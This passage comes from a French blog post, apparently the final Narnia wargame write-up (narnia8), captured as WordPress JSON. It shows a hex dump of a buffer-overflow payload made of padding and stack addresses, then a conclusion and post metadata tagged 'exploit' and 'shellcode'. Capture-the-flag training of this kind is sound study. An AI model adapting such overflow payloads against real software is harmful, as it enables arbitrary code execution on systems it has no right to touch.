data-line=\"\" class=\"highlight-height language-bash line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA\r\n00000010: 4141 4141 d82f ffff d8d4 ffff 1192 0408  AAAA.\/..........\r\n00000020: f6d6 ffff 20d0 fff7 1925 daf7 020a       .... ....%....\r\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-80090ce elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"80090ce\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b69cf4f\" data-id=\"b69cf4f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7241593 elementor-widget elementor-widget-text-editor\" data-id=\"7241593\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>C&#8217;est d\u00e9sormais \u00e0 vous de jouer pour trouver les bonnes valeurs !<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4c1878f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4c1878f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-13fd1f8\" data-id=\"13fd1f8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-cb5b380 elementor-widget elementor-widget-heading\" data-id=\"cb5b380\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Conclusion<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1e39b2f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1e39b2f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c751902\" data-id=\"c751902\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f1a0b1e elementor-widget__width-initial elementor-widget elementor-widget-text-editor\" data-id=\"f1a0b1e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Voil\u00e0 pour le dernier article de la s\u00e9rie Narnia !<\/p><p>J&#8217;esp\u00e8re que cela vous a plu et que vous avez pris autant de plaisir que moi \u00e0 r\u00e9aliser ces challenges.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Nous nous retrouvons pour ce dernier challenge de la s\u00e9rie Narnia. J&#8217;ai beaucoup appr\u00e9ci\u00e9 faire ces challenges, ils m&#8217;en ont appris beaucoup sur les Buffer Overflow, le fonctionnement d&#8217;une pile, l&#8217;assembleur etc. J&#8217;esp\u00e8re que c&#8217;est le cas pour vous aussi ! D\u00e9couverte #include #include #include \/\/ gcc&#8217;s variable reordering fucked things up \/\/ to keep&hellip; <br \/> <a class=\"button small blue\" href=\"https:\/\/mindshield.eu\/index.php\/2023\/09\/01\/narnia8\/\">Read more<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[8,10,9],"class_list":["post-744","post","type-post","status-publish","format-standard","hentry","category-narnia_challenges","tag-challenge","tag-exploit","tag-shellcode"],"_links":{"self":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/744","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/comments?post=744"}],"version-history":[{"count":62,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/744\/revisions"}],"predecessor-version":[{"id":921,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/744\/revisions\/921"}],"wp:attachment":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/media?parent=744"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/categories?post=744"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/tags?post=744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}